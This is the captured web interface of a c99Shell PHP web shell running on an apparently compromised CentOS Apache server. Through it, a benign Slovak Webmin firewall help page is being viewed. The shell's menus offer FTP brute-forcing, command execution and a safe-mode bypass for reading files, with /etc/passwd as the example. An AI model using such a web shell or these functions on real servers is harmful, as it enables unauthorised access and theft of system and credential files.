!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/firewall/help/   drwxr-xr-x
Free 48.09 GB of 127.8 GB (37.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     intro.sk.UTF-8.html (3.99 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Firewall Linuxu

Úvod k modulu

Tento modul umožňuje nakonfigurovať funkcie IP tabuliek firewallu, ktoré sa nachádzajú v Linuxových jadrach rady 2.4. Na rozdiel od niektorých iných programov na konfiguráciu firewallu namiesto vytvárania scriptu pre shell, ktorý nastaví firewall, tento modul prečíta a edituje pravidlá z uloženého súboru vo formáte, ktorý je načítavaný a zapisovaný programami iptables-restore a iptables-save.

Ak už máte vo Vašom systéme firewall, ktorý bol nastavený ručne alebo pomocou scriptu, modul ponúka aj jeho konverziu na IP tabuľky uložené v súbore a vytvorí script, ktorý aktivuje pravidlá zo súboru pri zavádzaní systému. Avšak ak to urobíte a nebudete chcieť pravidlá firewallu na dlhší čas používať, môžete tiež aktiváciu pravidiel pri zavádzaní vypnúť.

Prehľad IP tabuliek

Každý sieťový paket, ktorý prichádza dnu, odchádza von alebo je presmerovaný Vaším systémom, je skontrolovaný jedným alebo viacerými zreťazeniami, ktoré určia, čo sa s ním má stať. Každé zreťazenie obsahuje nula alebo viac pravidiel, z ktorých každé má podmienku (určujúcu, pre ktoré pakety bude platiť) a akciu (určujúcu, čo sa má stať s paketmi splňujúcimi podmienku). Každé zreťazenie má tiež predvolenú akciu, ktorá hovorí čo sa má stať s paketmi, ktoré nespĺňajú ani jednu z uvedených podmienok.

Každé zreťazenie je súčasťou jednej z troch tabuliek:

  • Filtrovanie paketov (filter)
    Zreťazenia v tejto tabuľke môžu byť použité na ovládanie dát prichádzajúcich do systému z iných staníc siete, dát odoslaných z Vášho systému používateľmi a procesmi a dát presmerovaných vaším systémom, ak funguje ako router.

  • Preklad sieťovej adresy (nat)
    Táto tabuľka môže byť použitá na nastavenie NAT alebo maškarády, čo je užitočné, ak chcete z celej vašej siete pristupovať do internetu iba s jednou skutočnou IP adresou.

  • Zmena paketov (mangle)
    Toto zreťazenie slúži na úpravu paketov presmerovaných alebo odoslaných Vašim systémom.

Ako dodatok ku štandardným zreťazeniam, ktoré sú súčasťou každej tabuľky, môžete tiež vytvoriť Vaše vlastné zreťazenie, ktoré môže byť spustené pravidlami zo zabudovaných zreťazení. To môže byť užitočné pri skupinových a zdielaných pravidlách, ktoré by bolo inak potrebné použiť na viacerých miestach.

Hlavná stránka

Hlavná stránka tohto modulu zobrazuje všetky zreťazenia a pravidlá jednej z dostupných tabuliek, vybranej zo zoznamu vľavo hore. Nižšie sú časti pre každé zreťazenie v aktuálnej tabuľke so všetkými pravidlami a ich podmienkami, ktoré najlepšie opisujú schopnosti modulu. Pre každé zreťazenie, ktoré je zabudované v tabuľke, môžete definovať predvolenú akciu prostredníctvom rozbaľovacieho poľa. Vlastnoručne zadefinované zreťazenia môžete odstrániť pomocou tlačidla Odstrániť zreťazenie.

Môžete kliknúť na ľubovoľné pravidlo v zreťazení a upraviť ho, kliknúť na šipku vpravo a presunúť ho vyššie alebo nižšie alebo kliknúť na tlačítko pridať a zadefinovať nové pravidlo. Pridávanie alebo úprava pravidla Vás presunie na stránku, na ktorej môžete vybrať pre pravidlo akciu a podmienku, pri ktorej sa má akcia vykonať.

V spodnej časti stránky je tlačidlo na aktivovanie aktuálnej konfigurácie, ktoré ju nahrá do jadra pomocou iptables-restore. Pod ním je tlačidlo na vykonanie obnovy - vezme konfiguráciu, ktorá je nahraná v jadre a umožní ju upravovať. Ak to vaša distribúcia podporuje, je tu ešte tlačidlo, ktoré nastaví, či sa má firewall aktivovať pri zavádzaní systému alebo nie.


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0112 ]--